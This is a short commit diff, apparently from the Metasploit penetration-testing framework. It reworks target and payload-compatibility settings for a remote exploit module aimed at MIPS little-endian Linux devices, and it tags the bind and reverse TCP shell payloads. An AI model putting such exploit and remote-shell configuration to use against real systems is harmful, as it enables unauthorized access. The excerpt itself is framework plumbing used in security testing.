compatible payloads

unstable
m-1-k-3 2013-03-29 20:54:35 +01:00
parent 0164cc34be
commit c5e358c9c3
3 changed files with 27 additions and 36 deletions

View File

@ -35,41 +35,29 @@ class Metasploit3 < Msf::Exploit::Remote
#'Platform' => 'linux',
#'Arch' => ARCH_MIPSLE,
'Targets' =>
[
[ 'Unix CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix',
#only payload cmd/unix/generic should be possible
'Payload' =>
{
'Compat' =>
{
#not working :(
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic'
}
},
}
],
[ 'Linux Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux',
'DisableNops' => true,
#only mipsel payloads working ...
'Payload' =>
{
'Compat' =>
{
#not working :(
'PayloadType' => 'mipsle',
'RequiredCmd' => 'shell'
}
},
}
],
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix',
}
],
[ 'Linux Mipsel Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux',
'DisableNops' => true,
}
],
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd mipsle',
'RequiredCmd' => 'generic shell_bind_tcp shell_reverse_tcp'
},
},
'DefaultTarget' => 1,
))
@ -156,8 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
request(cmd,user,pass,uri)
else
#lets get some shells ...
#thx to Juan for his awesome work on the mipsel payloads
@pl = generate_payload_exe
#

View File

@ -26,6 +26,8 @@ module Metasploit3
'Arch' => ARCH_MIPSLE,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'PayloadType' => 'mipsle',
'RequiredCmd' => 'shell_bind_tcp',
'Payload' =>
{
'Offsets' => {} ,

View File

@ -29,6 +29,8 @@ module Metasploit3
'Arch' => ARCH_MIPSLE,
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'PayloadType' => 'mipsle',
'RequiredCmd' => 'shell_reverse_tcp',
'Payload' =>
{
'Offsets' => { },